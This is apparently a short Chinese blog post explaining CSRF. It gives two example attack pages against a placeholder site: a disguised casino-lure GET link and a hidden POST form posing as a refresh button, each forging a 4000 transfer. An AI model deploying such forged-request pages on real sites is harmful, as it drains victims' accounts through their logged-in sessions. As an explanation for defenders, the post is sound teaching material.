原理

CSRF，跨站请求伪造，攻击者利用目标用户的身份来执行一些非法的操作，CSRF需要满足两个条件

1. 目标用户已登录并能够执行相应的网站功能
2. 目标用户访问了攻击者构造的URL
3. 后台未对用户业务展开合法性做校验

看到一篇不错的博客，源地址

例如，某网站www.test1.com,他可以进行转账操作，在提交转账申请的时候，他会通过get方式传递两个参数：name和number，以此来确定转账对象和转账金额，假设用户A已经登录了该网站，我们构造一个页面，其代码如下

<html>
<head>
<meta ....... />  
</head>
<body>
<h1>xixi</h1>
<div>
<a href="http://www.test1.com/money.php?name="zhangsan"&number=4000">性感荷官在线发牌</a>
</div>
</html>

如果A这个倒霉蛋点了这个链接，美女荷官没看到，倒是先-4000

如果这个傻瓜网站改进了技术，使用了post，那代码构造稍微复杂一点，需要创建一个隐藏表单，当用户访问的时候自动提交表单到目标连接，不过，如果那个网站使用了$_REQUEST来获取数据的话，那还是使用上面这种也行

<html>
<head>
..
<head>
<body>
<div>
<form action="http://www.test1.com/money.php" name="form" methon="post" role="form">
<input type="hidden" name="name" value="zhangsan">
<input type="hidden" name="number" value="4000">
<input type="submit" value="页面没加载出来？点此刷新"/>
</form>
</div>
</body>
</html>

于是倒霉鬼再次-4000